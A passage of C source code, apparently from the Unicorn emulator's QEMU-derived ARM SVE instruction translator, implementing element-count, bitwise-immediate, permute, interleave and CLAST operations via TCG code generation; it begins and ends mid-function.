*s, arg_rr_esz *a) { return do_pfirst_pnext(s, a, gen_helper_sve_pfirst); } static bool trans_PNEXT(DisasContext *s, arg_rr_esz *a) { return do_pfirst_pnext(s, a, gen_helper_sve_pnext); } /* *** SVE Element Count Group */ /* Perform an inline saturating addition of a 32-bit value within * a 64-bit register. The second operand is known to be positive, * which halves the comparisions we must perform to bound the result. */ static void do_sat_addsub_32(TCGContext *tcg_ctx, TCGv_i64 reg, TCGv_i64 val, bool u, bool d) { int64_t ibound; TCGv_i64 bound; TCGCond cond; /* Use normal 64-bit arithmetic to detect 32-bit overflow. */ if (u) { tcg_gen_ext32u_i64(tcg_ctx, reg, reg); } else { tcg_gen_ext32s_i64(tcg_ctx, reg, reg); } if (d) { tcg_gen_sub_i64(tcg_ctx, reg, reg, val); ibound = (u ? 0 : INT32_MIN); cond = TCG_COND_LT; } else { tcg_gen_add_i64(tcg_ctx, reg, reg, val); ibound = (u ? UINT32_MAX : INT32_MAX); cond = TCG_COND_GT; } bound = tcg_const_i64(tcg_ctx, ibound); tcg_gen_movcond_i64(tcg_ctx, cond, reg, reg, bound, bound, reg); tcg_temp_free_i64(tcg_ctx, bound); } /* Similarly with 64-bit values. */ static void do_sat_addsub_64(TCGContext *tcg_ctx, TCGv_i64 reg, TCGv_i64 val, bool u, bool d) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2; if (u) { if (d) { tcg_gen_sub_i64(tcg_ctx, t0, reg, val); tcg_gen_movi_i64(tcg_ctx, t1, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, reg, reg, val, t1, t0); } else { tcg_gen_add_i64(tcg_ctx, t0, reg, val); tcg_gen_movi_i64(tcg_ctx, t1, -1); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, reg, t0, reg, t1, t0); } } else { if (d) { /* Detect signed overflow for subtraction. */ tcg_gen_xor_i64(tcg_ctx, t0, reg, val); tcg_gen_sub_i64(tcg_ctx, t1, reg, val); tcg_gen_xor_i64(tcg_ctx, reg, reg, t1); tcg_gen_and_i64(tcg_ctx, t0, t0, reg); /* Bound the result. */ tcg_gen_movi_i64(tcg_ctx, reg, INT64_MIN); t2 = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, reg, t0, t2, reg, t1); } else { /* Detect signed overflow for addition. */ tcg_gen_xor_i64(tcg_ctx, t0, reg, val); tcg_gen_add_i64(tcg_ctx, reg, reg, val); tcg_gen_xor_i64(tcg_ctx, t1, reg, val); tcg_gen_andc_i64(tcg_ctx, t0, t1, t0); /* Bound the result. */ tcg_gen_movi_i64(tcg_ctx, t1, INT64_MAX); t2 = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, reg, t0, t2, t1, reg); } tcg_temp_free_i64(tcg_ctx, t2); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* Similarly with a vector and a scalar operand. */ static void do_sat_addsub_vec(DisasContext *s, int esz, int rd, int rn, TCGv_i64 val, bool u, bool d) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr dptr, nptr; TCGv_i32 t32, desc; TCGv_i64 t64; dptr = tcg_temp_new_ptr(tcg_ctx); nptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, dptr, tcg_ctx->cpu_env, vec_full_reg_offset(s, rd)); tcg_gen_addi_ptr(tcg_ctx, nptr, tcg_ctx->cpu_env, vec_full_reg_offset(s, rn)); desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); switch (esz) { case MO_8: t32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t32, val); if (d) { tcg_gen_neg_i32(tcg_ctx, t32, t32); } if (u) { gen_helper_sve_uqaddi_b(tcg_ctx, dptr, nptr, t32, desc); } else { gen_helper_sve_sqaddi_b(tcg_ctx, dptr, nptr, t32, desc); } tcg_temp_free_i32(tcg_ctx, t32); break; case MO_16: t32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t32, val); if (d) { tcg_gen_neg_i32(tcg_ctx, t32, t32); } if (u) { gen_helper_sve_uqaddi_h(tcg_ctx, dptr, nptr, t32, desc); } else { gen_helper_sve_sqaddi_h(tcg_ctx, dptr, nptr, t32, desc); } tcg_temp_free_i32(tcg_ctx, t32); break; case MO_32: t64 = tcg_temp_new_i64(tcg_ctx); if (d) { tcg_gen_neg_i64(tcg_ctx, t64, val); } else { tcg_gen_mov_i64(tcg_ctx, t64, val); } if (u) { gen_helper_sve_uqaddi_s(tcg_ctx, dptr, nptr, t64, desc); } else { gen_helper_sve_sqaddi_s(tcg_ctx, dptr, nptr, t64, desc); } tcg_temp_free_i64(tcg_ctx, t64); break; case MO_64: if (u) { if (d) { gen_helper_sve_uqsubi_d(tcg_ctx, dptr, nptr, val, desc); } else { gen_helper_sve_uqaddi_d(tcg_ctx, dptr, nptr, val, desc); } } else if (d) { t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_neg_i64(tcg_ctx, t64, val); gen_helper_sve_sqaddi_d(tcg_ctx, dptr, nptr, t64, desc); tcg_temp_free_i64(tcg_ctx, t64); } else { gen_helper_sve_sqaddi_d(tcg_ctx, dptr, nptr, val, desc); } break; default: g_assert_not_reached(); } tcg_temp_free_ptr(tcg_ctx, dptr); tcg_temp_free_ptr(tcg_ctx, nptr); tcg_temp_free_i32(tcg_ctx, desc); } static bool trans_CNT_r(DisasContext *s, arg_CNT_r *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, a->rd), numelem * a->imm); } return true; } static bool trans_INCDEC_r(DisasContext *s, arg_incdec_cnt *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); int inc = numelem * a->imm * (a->d ? -1 : 1); TCGv_i64 reg = cpu_reg(s, a->rd); tcg_gen_addi_i64(tcg_ctx, reg, reg, inc); } return true; } static bool trans_SINCDEC_r_32(DisasContext *s, arg_incdec_cnt *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); int inc = numelem * a->imm; TCGv_i64 reg = cpu_reg(s, a->rd); /* Use normal 64-bit arithmetic to detect 32-bit overflow. */ if (inc == 0) { if (a->u) { tcg_gen_ext32u_i64(tcg_ctx, reg, reg); } else { tcg_gen_ext32s_i64(tcg_ctx, reg, reg); } } else { TCGv_i64 t = tcg_const_i64(tcg_ctx, inc); do_sat_addsub_32(tcg_ctx, reg, t, a->u, a->d); tcg_temp_free_i64(tcg_ctx, t); } return true; } static bool trans_SINCDEC_r_64(DisasContext *s, arg_incdec_cnt *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); int inc = numelem * a->imm; TCGv_i64 reg = cpu_reg(s, a->rd); if (inc != 0) { TCGv_i64 t = tcg_const_i64(tcg_ctx, inc); do_sat_addsub_64(tcg_ctx, reg, t, a->u, a->d); tcg_temp_free_i64(tcg_ctx, t); } return true; } static bool trans_INCDEC_v(DisasContext *s, arg_incdec2_cnt *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); int inc = numelem * a->imm; if (inc != 0) { if (sve_access_check(s)) { TCGv_i64 t = tcg_const_i64(tcg_ctx, a->d ? -inc : inc); tcg_gen_gvec_adds(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), t, fullsz, fullsz); tcg_temp_free_i64(tcg_ctx, t); } } else { do_mov_z(s, a->rd, a->rn); } return true; } static bool trans_SINCDEC_v(DisasContext *s, arg_incdec2_cnt *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); int inc = numelem * a->imm; if (inc != 0) { if (sve_access_check(s)) { TCGv_i64 t = tcg_const_i64(tcg_ctx, inc); do_sat_addsub_vec(s, a->esz, a->rd, a->rn, t, a->u, a->d); tcg_temp_free_i64(tcg_ctx, t); } } else { do_mov_z(s, a->rd, a->rn); } return true; } /* *** SVE Bitwise Immediate Group */ static bool do_zz_dbm(DisasContext *s, arg_rr_dbm *a, GVecGen2iFn *gvec_fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t imm; if (!logic_imm_decode_wmask(&imm, extract32(a->dbm, 12, 1), extract32(a->dbm, 0, 6), extract32(a->dbm, 6, 6))) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); gvec_fn(tcg_ctx, MO_64, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), imm, vsz, vsz); } return true; } static bool trans_AND_zzi(DisasContext *s, arg_rr_dbm *a) { return do_zz_dbm(s, a, tcg_gen_gvec_andi); } static bool trans_ORR_zzi(DisasContext *s, arg_rr_dbm *a) { return do_zz_dbm(s, a, tcg_gen_gvec_ori); } static bool trans_EOR_zzi(DisasContext *s, arg_rr_dbm *a) { return do_zz_dbm(s, a, tcg_gen_gvec_xori); } static bool trans_DUPM(DisasContext *s, arg_DUPM *a) { uint64_t imm; if (!logic_imm_decode_wmask(&imm, extract32(a->dbm, 12, 1), extract32(a->dbm, 0, 6), extract32(a->dbm, 6, 6))) { return false; } if (sve_access_check(s)) { do_dupi_z(s, a->rd, imm); } return true; } /* *** SVE Integer Wide Immediate - Predicated Group */ /* Implement all merging copies. This is used for CPY (immediate), * FCPY, CPY (scalar), CPY (SIMD&FP scalar). */ static void do_cpy_m(DisasContext *s, int esz, int rd, int rn, int pg, TCGv_i64 val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; typedef void gen_cpy(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i64, TCGv_i32); static gen_cpy * const fns[4] = { gen_helper_sve_cpy_m_b, gen_helper_sve_cpy_m_h, gen_helper_sve_cpy_m_s, gen_helper_sve_cpy_m_d, }; unsigned vsz = vec_full_reg_size(s); TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); TCGv_ptr t_zd = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_zn = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zd, tcg_ctx->cpu_env, vec_full_reg_offset(s, rd)); tcg_gen_addi_ptr(tcg_ctx, t_zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, rn)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); fns[esz](tcg_ctx, t_zd, t_zn, t_pg, val, desc); tcg_temp_free_ptr(tcg_ctx, t_zd); tcg_temp_free_ptr(tcg_ctx, t_zn); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, desc); } static bool trans_FCPY(DisasContext *s, arg_FCPY *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } if (sve_access_check(s)) { /* Decode the VFP immediate. */ uint64_t imm = vfp_expand_imm(a->esz, a->imm); TCGv_i64 t_imm = tcg_const_i64(tcg_ctx, imm); do_cpy_m(s, a->esz, a->rd, a->rn, a->pg, t_imm); tcg_temp_free_i64(tcg_ctx, t_imm); } return true; } static bool trans_CPY_m_i(DisasContext *s, arg_rpri_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { TCGv_i64 t_imm = tcg_const_i64(tcg_ctx, a->imm); do_cpy_m(s, a->esz, a->rd, a->rn, a->pg, t_imm); tcg_temp_free_i64(tcg_ctx, t_imm); } return true; } static bool trans_CPY_z_i(DisasContext *s, arg_CPY_z_i *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_2i * const fns[4] = { gen_helper_sve_cpy_z_b, gen_helper_sve_cpy_z_h, gen_helper_sve_cpy_z_s, gen_helper_sve_cpy_z_d, }; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_i64 t_imm = tcg_const_i64(tcg_ctx, a->imm); tcg_gen_gvec_2i_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), pred_full_reg_offset(s, a->pg), t_imm, vsz, vsz, 0, fns[a->esz]); tcg_temp_free_i64(tcg_ctx, t_imm); } return true; } /* *** SVE Permute Extract Group */ static bool trans_EXT(DisasContext *s, arg_EXT *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = vec_full_reg_size(s); unsigned n_ofs = a->imm >= vsz ? 0 : a->imm; unsigned n_siz = vsz - n_ofs; unsigned d = vec_full_reg_offset(s, a->rd); unsigned n = vec_full_reg_offset(s, a->rn); unsigned m = vec_full_reg_offset(s, a->rm); /* Use host vector move insns if we have appropriate sizes * and no unfortunate overlap. */ if (m != d && n_ofs == size_for_gvec(n_ofs) && n_siz == size_for_gvec(n_siz) && (d != n || n_siz <= n_ofs)) { tcg_gen_gvec_mov(tcg_ctx, 0, d, n + n_ofs, n_siz, n_siz); if (n_ofs != 0) { tcg_gen_gvec_mov(tcg_ctx, 0, d + n_siz, m, n_ofs, n_ofs); } } else { tcg_gen_gvec_3_ool(tcg_ctx, d, n, m, vsz, vsz, n_ofs, gen_helper_sve_ext); } return true; } /* *** SVE Permute - Unpredicated Group */ static bool trans_DUP_s(DisasContext *s, arg_DUP_s *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_dup_i64(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vsz, vsz, cpu_reg_sp(s, a->rn)); } return true; } static bool trans_DUP_x(DisasContext *s, arg_DUP_x *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if ((a->imm & 0x1f) == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); unsigned dofs = vec_full_reg_offset(s, a->rd); unsigned esz, index; esz = ctz32(a->imm); index = a->imm >> (esz + 1); if ((index << esz) < vsz) { unsigned nofs = vec_reg_offset(s, a->rn, index, esz); tcg_gen_gvec_dup_mem(tcg_ctx, esz, dofs, nofs, vsz, vsz); } else { tcg_gen_gvec_dup64i(tcg_ctx, dofs, vsz, vsz, 0); } } return true; } static void do_insr_i64(DisasContext *s, arg_rrr_esz *a, TCGv_i64 val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; typedef void gen_insr(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_i64, TCGv_i32); static gen_insr * const fns[4] = { gen_helper_sve_insr_b, gen_helper_sve_insr_h, gen_helper_sve_insr_s, gen_helper_sve_insr_d, }; unsigned vsz = vec_full_reg_size(s); TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); TCGv_ptr t_zd = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_zn = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zd, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, t_zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rn)); fns[a->esz](tcg_ctx, t_zd, t_zn, val, desc); tcg_temp_free_ptr(tcg_ctx, t_zd); tcg_temp_free_ptr(tcg_ctx, t_zn); tcg_temp_free_i32(tcg_ctx, desc); } static bool trans_INSR_f(DisasContext *s, arg_rrr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, t, tcg_ctx->cpu_env, vec_reg_offset(s, a->rm, 0, MO_64)); do_insr_i64(s, a, t); tcg_temp_free_i64(tcg_ctx, t); } return true; } static bool trans_INSR_r(DisasContext *s, arg_rrr_esz *a) { if (sve_access_check(s)) { do_insr_i64(s, a, cpu_reg(s, a->rm)); } return true; } static bool trans_REV_v(DisasContext *s, arg_rr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_2 * const fns[4] = { gen_helper_sve_rev_b, gen_helper_sve_rev_h, gen_helper_sve_rev_s, gen_helper_sve_rev_d }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_2_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vsz, vsz, 0, fns[a->esz]); } return true; } static bool trans_TBL(DisasContext *s, arg_rrr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_tbl_b, gen_helper_sve_tbl_h, gen_helper_sve_tbl_s, gen_helper_sve_tbl_d }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, 0, fns[a->esz]); } return true; } static bool trans_UNPK(DisasContext *s, arg_UNPK *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_2 * const fns[4][2] = { { NULL, NULL }, { gen_helper_sve_sunpk_h, gen_helper_sve_uunpk_h }, { gen_helper_sve_sunpk_s, gen_helper_sve_uunpk_s }, { gen_helper_sve_sunpk_d, gen_helper_sve_uunpk_d }, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_2_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn) + (a->h ? vsz / 2 : 0), vsz, vsz, 0, fns[a->esz][a->u]); } return true; } /* *** SVE Permute - Predicates Group */ static bool do_perm_pred3(DisasContext *s, arg_rrr_esz *a, bool high_odd, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = pred_full_reg_size(s); /* Predicate sizes may be smaller and cannot use simd_desc. We cannot round up, as we do elsewhere, because we need the exact size for ZIP2 and REV. We retain the style for the other helpers for consistency. */ TCGv_ptr t_d = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_n = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_m = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t_desc; int desc; desc = vsz - 2; desc = deposit32(desc, SIMD_DATA_SHIFT, 2, a->esz); desc = deposit32(desc, SIMD_DATA_SHIFT + 2, 2, high_odd); tcg_gen_addi_ptr(tcg_ctx, t_d, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, t_n, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, t_m, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rm)); t_desc = tcg_const_i32(tcg_ctx, desc); fn(tcg_ctx, t_d, t_n, t_m, t_desc); tcg_temp_free_ptr(tcg_ctx, t_d); tcg_temp_free_ptr(tcg_ctx, t_n); tcg_temp_free_ptr(tcg_ctx, t_m); tcg_temp_free_i32(tcg_ctx, t_desc); return true; } static bool do_perm_pred2(DisasContext *s, arg_rr_esz *a, bool high_odd, gen_helper_gvec_2 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = pred_full_reg_size(s); TCGv_ptr t_d = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_n = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t_desc; int desc; tcg_gen_addi_ptr(tcg_ctx, t_d, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, t_n, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rn)); /* Predicate sizes may be smaller and cannot use simd_desc. We cannot round up, as we do elsewhere, because we need the exact size for ZIP2 and REV. We retain the style for the other helpers for consistency. */ desc = vsz - 2; desc = deposit32(desc, SIMD_DATA_SHIFT, 2, a->esz); desc = deposit32(desc, SIMD_DATA_SHIFT + 2, 2, high_odd); t_desc = tcg_const_i32(tcg_ctx, desc); fn(tcg_ctx, t_d, t_n, t_desc); tcg_temp_free_i32(tcg_ctx, t_desc); tcg_temp_free_ptr(tcg_ctx, t_d); tcg_temp_free_ptr(tcg_ctx, t_n); return true; } static bool trans_ZIP1_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 0, gen_helper_sve_zip_p); } static bool trans_ZIP2_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 1, gen_helper_sve_zip_p); } static bool trans_UZP1_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 0, gen_helper_sve_uzp_p); } static bool trans_UZP2_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 1, gen_helper_sve_uzp_p); } static bool trans_TRN1_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 0, gen_helper_sve_trn_p); } static bool trans_TRN2_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 1, gen_helper_sve_trn_p); } static bool trans_REV_p(DisasContext *s, arg_rr_esz *a) { return do_perm_pred2(s, a, 0, gen_helper_sve_rev_p); } static bool trans_PUNPKLO(DisasContext *s, arg_PUNPKLO *a) { return do_perm_pred2(s, a, 0, gen_helper_sve_punpk_p); } static bool trans_PUNPKHI(DisasContext *s, arg_PUNPKHI *a) { return do_perm_pred2(s, a, 1, gen_helper_sve_punpk_p); } /* *** SVE Permute - Interleaving Group */ static bool do_zip(DisasContext *s, arg_rrr_esz *a, bool high) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_zip_b, gen_helper_sve_zip_h, gen_helper_sve_zip_s, gen_helper_sve_zip_d, }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); unsigned high_ofs = high ? vsz / 2 : 0; tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn) + high_ofs, vec_full_reg_offset(s, a->rm) + high_ofs, vsz, vsz, 0, fns[a->esz]); } return true; } static bool do_zzz_data_ool(DisasContext *s, arg_rrr_esz *a, int data, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, data, fn); } return true; } static bool trans_ZIP1_z(DisasContext *s, arg_rrr_esz *a) { return do_zip(s, a, false); } static bool trans_ZIP2_z(DisasContext *s, arg_rrr_esz *a) { return do_zip(s, a, true); } static gen_helper_gvec_3 * const uzp_fns[4] = { gen_helper_sve_uzp_b, gen_helper_sve_uzp_h, gen_helper_sve_uzp_s, gen_helper_sve_uzp_d, }; static bool trans_UZP1_z(DisasContext *s, arg_rrr_esz *a) { return do_zzz_data_ool(s, a, 0, uzp_fns[a->esz]); } static bool trans_UZP2_z(DisasContext *s, arg_rrr_esz *a) { return do_zzz_data_ool(s, a, 1 << a->esz, uzp_fns[a->esz]); } static gen_helper_gvec_3 * const trn_fns[4] = { gen_helper_sve_trn_b, gen_helper_sve_trn_h, gen_helper_sve_trn_s, gen_helper_sve_trn_d, }; static bool trans_TRN1_z(DisasContext *s, arg_rrr_esz *a) { return do_zzz_data_ool(s, a, 0, trn_fns[a->esz]); } static bool trans_TRN2_z(DisasContext *s, arg_rrr_esz *a) { return do_zzz_data_ool(s, a, 1 << a->esz, trn_fns[a->esz]); } /* *** SVE Permute Vector - Predicated Group */ static bool trans_COMPACT(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, NULL, gen_helper_sve_compact_s, gen_helper_sve_compact_d }; return do_zpz_ool(s, a, fns[a->esz]); } /* Call the helper that computes the ARM LastActiveElement pseudocode * function, scaled by the element size. This includes the not found * indication; e.g. not found for esz=3 is -8. */ static void find_last_active(DisasContext *s, TCGv_i32 ret, int esz, int pg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Predicate sizes may be smaller and cannot use simd_desc. We cannot * round up, as we do elsewhere, because we need the exact size. */ TCGv_ptr t_p = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t_desc; unsigned vsz = pred_full_reg_size(s); unsigned desc; desc = vsz - 2; desc = deposit32(desc, SIMD_DATA_SHIFT, 2, esz); tcg_gen_addi_ptr(tcg_ctx, t_p, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); t_desc = tcg_const_i32(tcg_ctx, desc); gen_helper_sve_last_active_element(tcg_ctx, ret, t_p, t_desc); tcg_temp_free_i32(tcg_ctx, t_desc); tcg_temp_free_ptr(tcg_ctx, t_p); } /* Increment LAST to the offset of the next element in the vector, * wrapping around to 0. */ static void incr_last_active(DisasContext *s, TCGv_i32 last, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); tcg_gen_addi_i32(tcg_ctx, last, last, 1 << esz); if (is_power_of_2(vsz)) { tcg_gen_andi_i32(tcg_ctx, last, last, vsz - 1); } else { TCGv_i32 max = tcg_const_i32(tcg_ctx, vsz); TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GEU, last, last, max, zero, last); tcg_temp_free_i32(tcg_ctx, max); tcg_temp_free_i32(tcg_ctx, zero); } } /* If LAST < 0, set LAST to the offset of the last element in the vector. */ static void wrap_last_active(DisasContext *s, TCGv_i32 last, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); if (is_power_of_2(vsz)) { tcg_gen_andi_i32(tcg_ctx, last, last, vsz - 1); } else { TCGv_i32 max = tcg_const_i32(tcg_ctx, vsz - (1 << esz)); TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, last, last, zero, max, last); tcg_temp_free_i32(tcg_ctx, max); tcg_temp_free_i32(tcg_ctx, zero); } } /* Load an unsigned element of ESZ from BASE+OFS. */ static TCGv_i64 load_esz(TCGContext *tcg_ctx, TCGv_ptr base, int ofs, int esz) { TCGv_i64 r = tcg_temp_new_i64(tcg_ctx); switch (esz) { case 0: tcg_gen_ld8u_i64(tcg_ctx, r, base, ofs); break; case 1: tcg_gen_ld16u_i64(tcg_ctx, r, base, ofs); break; case 2: tcg_gen_ld32u_i64(tcg_ctx, r, base, ofs); break; case 3: tcg_gen_ld_i64(tcg_ctx, r, base, ofs); break; default: g_assert_not_reached(); } return r; } /* Load an unsigned element of ESZ from RM[LAST]. */ static TCGv_i64 load_last_active(DisasContext *s, TCGv_i32 last, int rm, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr p = tcg_temp_new_ptr(tcg_ctx); TCGv_i64 r; /* Convert offset into vector into offset into ENV. * The final adjustment for the vector register base * is added via constant offset to the load. */ #ifdef HOST_WORDS_BIGENDIAN /* Adjust for element ordering. See vec_reg_offset. */ if (esz < 3) { tcg_gen_xori_i32(tcg_ctx, last, last, 8 - (1 << esz)); } #endif tcg_gen_ext_i32_ptr(tcg_ctx, p, last); tcg_gen_add_ptr(tcg_ctx, p, p, tcg_ctx->cpu_env); r = load_esz(tcg_ctx, p, vec_full_reg_offset(s, rm), esz); tcg_temp_free_ptr(tcg_ctx, p); return r; } /* Compute CLAST for a Zreg. */ static bool do_clast_vector(DisasContext *s, arg_rprr_esz *a, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 last; TCGLabel *over; TCGv_i64 ele; unsigned vsz, esz = a->esz; if (!sve_access_check(s)) { return true; } last = tcg_temp_local_new_i32(tcg_ctx); over = gen_new_label(tcg_ctx); find_last_active(s, last, esz, a->pg); /* There is of course no movcond for a 2048-bit vector, * so we must branch over the actual store. */ tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, last, 0, over); if (!before) { incr_last_active(s, last, esz); } ele = load_last_active(s, last, a->rm, esz); tcg_temp_free_i32(tcg_ctx, last); vsz = vec_full_reg_size(s); tcg_gen_gvec_dup_i64(tcg_ctx, esz, vec_full_reg_offset(s, a->rd), vsz, vsz, ele); tcg_temp_free_i64(tcg_ctx, ele); /* If this insn used MOVPRFX, we may need a second move. */ if (a->rd != a->rn) { TCGLabel *done = gen_new_label(tcg_ctx); tcg_gen_br(tcg_ctx, done); gen_set_label(tcg_ctx, over); do_mov_z(s, a->rd, a->rn); 